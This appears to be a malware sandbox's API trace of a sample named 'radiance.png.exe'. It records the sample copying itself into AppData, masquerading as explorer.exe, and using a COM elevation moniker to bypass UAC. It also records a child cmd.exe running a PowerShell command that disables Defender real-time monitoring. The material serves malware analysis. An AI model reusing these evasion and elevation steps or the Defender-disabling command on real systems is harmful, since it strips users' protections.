	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0158a10, ftCreationTime.dwHighDateTime=0x1d4cd9d, ftLastAccessTime.dwLowDateTime=0xef82f490, ftLastAccessTime.dwHighDateTime=0x1d4c62a, ftLastWriteTime.dwLowDateTime=0xef82f490, ftLastWriteTime.dwHighDateTime=0x1d4c62a, nFileSizeHigh=0x0, nFileSizeLow=0x58d, dwReserved0=0x0, dwReserved1=0x80, cFileName="KXNXtpQIMsMTVuZU.jpg", cAlternateFileName="KXNXTP~1.JPG")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5eb6b0, ftCreationTime.dwHighDateTime=0x1d4c773, ftLastAccessTime.dwLowDateTime=0x398e1c90, ftLastAccessTime.dwHighDateTime=0x1d4cca2, ftLastWriteTime.dwLowDateTime=0x398e1c90, ftLastWriteTime.dwHighDateTime=0x1d4cca2, nFileSizeHigh=0x0, nFileSizeLow=0x164fc, dwReserved0=0x0, dwReserved1=0x80, cFileName="lf8vqE8V-apj.avi", cAlternateFileName="LF8VQE~1.AVI")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb34f0, ftCreationTime.dwHighDateTime=0x1d4d5ac, ftLastAccessTime.dwLowDateTime=0x1da0b260, ftLastAccessTime.dwHighDateTime=0x1d4cfe8, ftLastWriteTime.dwLowDateTime=0x1da0b260, ftLastWriteTime.dwHighDateTime=0x1d4cfe8, nFileSizeHigh=0x0, nFileSizeLow=0x8a67, dwReserved0=0x0, dwReserved1=0x80, cFileName="LzoGAryV3.csv", cAlternateFileName="LZOGAR~1.CSV")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23e099b0, ftCreationTime.dwHighDateTime=0x1d4d222, ftLastAccessTime.dwLowDateTime=0x2ca4bb60, ftLastAccessTime.dwHighDateTime=0x1d4d0ad, ftLastWriteTime.dwLowDateTime=0x2ca4bb60, ftLastWriteTime.dwHighDateTime=0x1d4d0ad, nFileSizeHigh=0x0, nFileSizeLow=0xa9d5, dwReserved0=0x0, dwReserved1=0x80, cFileName="O6-8k_S2rzR.swf", cAlternateFileName="O6-8K_~1.SWF")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d31c4f0, ftCreationTime.dwHighDateTime=0x1d4c68e, ftLastAccessTime.dwLowDateTime=0x206706d0, ftLastAccessTime.dwHighDateTime=0x1d4ce52, ftLastWriteTime.dwLowDateTime=0x206706d0, ftLastWriteTime.dwHighDateTime=0x1d4ce52, nFileSizeHigh=0x0, nFileSizeLow=0xaa6, dwReserved0=0x0, dwReserved1=0x80, cFileName="oSPou6A413IhTbzBxPI9.mp3", cAlternateFileName="OSPOU6~1.MP3")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cff4c00, ftCreationTime.dwHighDateTime=0x1d4c9d7, ftLastAccessTime.dwLowDateTime=0x7ee8e5c0, ftLastAccessTime.dwHighDateTime=0x1d4d433, ftLastWriteTime.dwLowDateTime=0x7ee8e5c0, ftLastWriteTime.dwHighDateTime=0x1d4d433, nFileSizeHigh=0x0, nFileSizeLow=0x1aef, dwReserved0=0x0, dwReserved1=0x80, cFileName="PJlez0 N8qbKej3 Ha 8.mp3", cAlternateFileName="PJLEZ0~1.MP3")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa5b6260, ftCreationTime.dwHighDateTime=0x1d4cdd9, ftLastAccessTime.dwLowDateTime=0x1833c990, ftLastAccessTime.dwHighDateTime=0x1d4c86b, ftLastWriteTime.dwLowDateTime=0x1833c990, ftLastWriteTime.dwHighDateTime=0x1d4c86b, nFileSizeHigh=0x0, nFileSizeLow=0x781b, dwReserved0=0x0, dwReserved1=0x80, cFileName="Qhnn_7frdTHsKs.bmp", cAlternateFileName="QHNN_7~1.BMP")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85dd480, ftCreationTime.dwHighDateTime=0x1d50c09, ftLastAccessTime.dwLowDateTime=0xe8f66b00, ftLastAccessTime.dwHighDateTime=0x1d50c09, ftLastWriteTime.dwLowDateTime=0x71541c00, ftLastWriteTime.dwHighDateTime=0x1d50bc8, nFileSizeHigh=0x0, nFileSizeLow=0x3e800, dwReserved0=0x0, dwReserved1=0x80, cFileName="radiance.png.exe", cAlternateFileName="RADIAN~1.EXE")) returned 1
	[0046.493] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118663d0, ftCreationTime.dwHighDateTime=0x1d4cc5a, ftLastAccessTime.dwLowDateTime=0x227bf480, ftLastAccessTime.dwHighDateTime=0x1d4c7f9, ftLastWriteTime.dwLowDateTime=0x227bf480, ftLastWriteTime.dwHighDateTime=0x1d4c7f9, nFileSizeHigh=0x0, nFileSizeLow=0x1226d, dwReserved0=0x0, dwReserved1=0x80, cFileName="URhzBr8jJ.xlsx", cAlternateFileName="URHZBR~1.XLS")) returned 1
	[0046.494] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4091250, ftCreationTime.dwHighDateTime=0x1d4d4a4, ftLastAccessTime.dwLowDateTime=0x7fec8da0, ftLastAccessTime.dwHighDateTime=0x1d4d113, ftLastWriteTime.dwLowDateTime=0x7fec8da0, ftLastWriteTime.dwHighDateTime=0x1d4d113, nFileSizeHigh=0x0, nFileSizeLow=0x53d0, dwReserved0=0x0, dwReserved1=0x80, cFileName="zbPR_45.gif", cAlternateFileName="")) returned 1
	[0046.494] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25bbfe90, ftCreationTime.dwHighDateTime=0x1d4d160, ftLastAccessTime.dwLowDateTime=0x4d55eb30, ftLastAccessTime.dwHighDateTime=0x1d4cd93, ftLastWriteTime.dwLowDateTime=0x4d55eb30, ftLastWriteTime.dwHighDateTime=0x1d4cd93, nFileSizeHigh=0x0, nFileSizeLow=0x6a4b, dwReserved0=0x0, dwReserved1=0x80, cFileName="zEkoP.m4a", cAlternateFileName="")) returned 1
	[0046.494] FindNextFileW (in: hFindFile=0x1b4c90, lpFindFileData=0x12a108 | out: lpFindFileData=0x12a108*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25bbfe90, ftCreationTime.dwHighDateTime=0x1d4d160, ftLastAccessTime.dwLowDateTime=0x4d55eb30, ftLastAccessTime.dwHighDateTime=0x1d4cd93, ftLastWriteTime.dwLowDateTime=0x4d55eb30, ftLastWriteTime.dwHighDateTime=0x1d4cd93, nFileSizeHigh=0x0, nFileSizeLow=0x6a4b, dwReserved0=0x0, dwReserved1=0x80, cFileName="zEkoP.m4a", cAlternateFileName="")) returned 0
	[0046.494] FindClose (in: hFindFile=0x1b4c90 | out: hFindFile=0x1b4c90) returned 1
	[0046.494] CreateDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata"), lpSecurityAttributes=0x0) returned 1
	[0046.495] CopyFileW (lpExistingFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe" (normalized: "c:\\users\\2xc7u663gxwc\\desktop\\radiance.png.exe"), lpNewFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe"), bFailIfExists=0) returned 1
	[0046.716] GetCurrentProcess () returned 0xffffffff
	[0046.716] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12a754 | out: TokenHandle=0x12a754*=0x80) returned 1
	[0046.716] NtQueryInformationToken (in: TokenHandle=0x80, TokenInformationClass=0x12, TokenInformation=0x12a764, TokenInformationLength=0x4, ReturnLength=0x12a74c | out: TokenInformation=0x12a764, ReturnLength=0x12a74c) returned 0x0
	[0046.716] CloseHandle (hObject=0x80) returned 1
	[0046.717] GetWindowsDirectoryW (in: lpBuffer=0x12a33c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
	[0046.717] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\"
	[0046.717] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe"
	[0046.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1a89061*=0x0, ZeroBits=0x0, RegionSize=0x12a338*=0x1000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x1a89061*=0x3f0000, RegionSize=0x12a338*=0x1000) returned 0x0
	[0046.717] lstrcpyW (in: lpString1=0x3f0000, lpString2="C:\\Windows\\explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe"
	[0046.717] RtlInitUnicodeString (in: DestinationString=0x171168, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") 
	[0046.717] RtlInitUnicodeString (in: DestinationString=0x171170, SourceString="bloody booty bla de bludy botty bla lhe capitaine bloode!" | out: DestinationString="bloody booty bla de bludy botty bla lhe capitaine bloode!") 
	[0046.717] LdrEnumerateLoadedModules () returned 0x0
	[0046.717] RtlInitUnicodeString (in: DestinationString=0x171974, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") 
	[0046.717] RtlInitUnicodeString (in: DestinationString=0x17197c, SourceString="explorer.exe" | out: DestinationString="explorer.exe") 
	[0046.717] Sleep (dwMilliseconds=0x1f4) 
	[0047.238] CoInitialize (pvReserved=0x0) returned 0x0
	[0047.239] IIDFromString (in: lpsz="{6EDD6D74-C007-4E75-B76A-E5740995E24C}", lpiid=0x12a734 | out: lpiid=0x12a734) returned 0x0
	[0047.239] CLSIDFromString (in: lpsz="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pclsid=0x12a748 | out: pclsid=0x12a748*(Data1=0x3e5fc7f9, Data2=0x9a51, Data3=0x4367, Data4=([0]=0x90, [1]=0x63, [2]=0xa1, [3]=0x20, [4]=0x24, [5]=0x4f, [6]=0xbe, [7]=0xc7))) returned 0x0
	[0047.239] lstrlenW (lpString="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned 38
	[0047.239] lstrcpyW (in: lpString1=0x12a284, lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
	[0047.239] lstrcpyW (in: lpString1=0x12a304, lpString2="Elevation:Administrator!new:" | out: lpString1="Elevation:Administrator!new:") returned="Elevation:Administrator!new:"
	[0047.240] lstrcatW (in: lpString1="Elevation:Administrator!new:", lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
	[0047.240] CoGetObject (in: pszName="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pBindOptions=0x12a258, riid=0x12a734*(Data1=0x6edd6d74, Data2=0xc007, Data3=0x4e75, Data4=([0]=0xb7, [1]=0x6a, [2]=0xe5, [3]=0x74, [4]=0x9, [5]=0x95, [6]=0xe2, [7]=0x4c)), ppv=0x12a730 | out: ppv=0x12a730*=0x1e7a74) returned 0x0
	[0053.075] ObjectStublessClient9 () 
	[0054.180] IUnknown:Release (This=0x1e7a74) returned 0x0
	[0054.570] Sleep (dwMilliseconds=0x3e8) 
	[0055.792] ExitProcess (uExitCode=0x0) 

Thread:
	id = 2
	os_tid = 0xd5c


Thread:
	id = 3
	os_tid = 0xd60


Thread:
	id = 4
	os_tid = 0xd64


Thread:
	id = 5
	os_tid = 0xd68


Thread:
	id = 7
	os_tid = 0xd74


Thread:
	id = 9
	os_tid = 0xd80


Thread:
	id = 23
	os_tid = 0xe34


Thread:
	id = 37
	os_tid = 0xf34


Process:
	id = "2"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee173e0"
	os_pid = "0xd6c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 6
	os_tid = 0xd70

	[0027.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df7d8 | out: lpSystemTimeAsFileTime=0x2df7d8*(dwLowDateTime=0xfcbd1680, dwHighDateTime=0x1d50a69)) 
	[0027.169] GetCurrentProcessId () returned 0xd6c
	[0027.169] GetCurrentThreadId () returned 0xd70
	[0027.169] GetTickCount () returned 0xa6008f
	[0027.169] QueryPerformanceCounter (in: lpPerformanceCount=0x2df7d0 | out: lpPerformanceCount=0x2df7d0*=10100670165) returned 1
	[0027.170] GetModuleHandleA (lpModuleName=0x0) returned 0x4a050000
	[0027.170] __set_app_type (_Type=0x1) 
	[0027.170] __p__fmode () returned 0x770231f4
	[0027.170] __p__commode () returned 0x770231fc
	[0027.170] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0721a6) returned 0x0
	[0027.170] __getmainargs (in: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c, _DoWildCard=0, _StartInfo=0x4a074140 | out: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c) returned 0
	[0027.170] GetCurrentThreadId () returned 0xd70
	[0027.170] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd70) returned 0x38
	[0027.170] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.170] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0027.170] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.171] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0027.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2df768 | out: phkResult=0x2df768*=0x0) returned 0x2
	[0027.171] VirtualQuery (in: lpAddress=0x2df79f, lpBuffer=0x2df738, dwLength=0x1c | out: lpBuffer=0x2df738*(BaseAddress=0x2df000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.171] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x2df738, dwLength=0x1c | out: lpBuffer=0x2df738*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0027.171] VirtualQuery (in: lpAddress=0x1e1000, lpBuffer=0x2df738, dwLength=0x1c | out: lpBuffer=0x2df738*(BaseAddress=0x1e1000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0027.171] VirtualQuery (in: lpAddress=0x1e3000, lpBuffer=0x2df738, dwLength=0x1c | out: lpBuffer=0x2df738*(BaseAddress=0x1e3000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.171] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x2df738, dwLength=0x1c | out: lpBuffer=0x2df738*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0027.171] GetConsoleOutputCP () returned 0x1b5
	[0027.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.171] SetConsoleCtrlHandler (HandlerRoutine=0x4a06e72a, Add=1) returned 1
	[0027.171] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.171] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0027.175] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.175] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0027.175] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0027.176] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.176] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0027.176] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.176] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0027.176] GetEnvironmentStringsW () returned 0xd0338*
	[0027.176] GetProcessHeap () returned 0xc0000
	[0027.176] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x932) returned 0xd0c78
	[0027.177] FreeEnvironmentStringsW (penv=0xd0338) returned 1
	[0027.177] GetProcessHeap () returned 0xc0000
	[0027.177] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4) returned 0xcfc18
	[0027.177] GetEnvironmentStringsW () returned 0xd0338*
	[0027.177] GetProcessHeap () returned 0xc0000
	[0027.177] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x932) returned 0xd15b8
	[0027.177] FreeEnvironmentStringsW (penv=0xd0338) returned 1
	[0027.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2de6d8 | out: phkResult=0x2de6d8*=0x40) returned 0x0
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0xe8, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x1, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0x1, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x0, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x40, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x40, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.177] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0x40, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.177] RegCloseKey (hKey=0x40) returned 0x0
	[0027.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2de6d8 | out: phkResult=0x2de6d8*=0x40) returned 0x0
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0x40, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x1, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0x1, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x0, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x9, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x4, lpData=0x2de6e4*=0x9, lpcbData=0x2de6dc*=0x4) returned 0x0
	[0027.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2de6e0, lpData=0x2de6e4, lpcbData=0x2de6dc*=0x1000 | out: lpType=0x2de6e0*=0x0, lpData=0x2de6e4*=0x9, lpcbData=0x2de6dc*=0x1000) returned 0x2
	[0027.178] RegCloseKey (hKey=0x40) returned 0x0
	[0027.178] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf20
	[0027.178] srand (_Seed=0x5cdadf20) 
	[0027.178] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0027.178] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0027.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.179] GetProcessHeap () returned 0xc0000
	[0027.179] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x210) returned 0xd0338
	[0027.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd0340, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0027.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0027.179] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0027.179] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0027.179] GetProcessHeap () returned 0xc0000
	[0027.179] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd0c78 | out: hHeap=0xc0000) returned 1
	[0027.179] GetEnvironmentStringsW () returned 0xd0550*
	[0027.180] GetProcessHeap () returned 0xc0000
	[0027.180] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x94a) returned 0xd2850
	[0027.180] FreeEnvironmentStringsW (penv=0xd0550) returned 1
	[0027.180] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0027.180] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.180] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0027.180] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0027.180] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0027.180] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0027.180] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0027.180] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0027.180] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0027.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0027.180] GetProcessHeap () returned 0xc0000
	[0027.180] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x44) returned 0xd01b8
	[0027.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2df4a4 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.180] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x104, lpBuffer=0x2df4a4, lpFilePart=0x2df4a0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2df4a0*="Desktop") returned 0x1d
	[0027.180] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
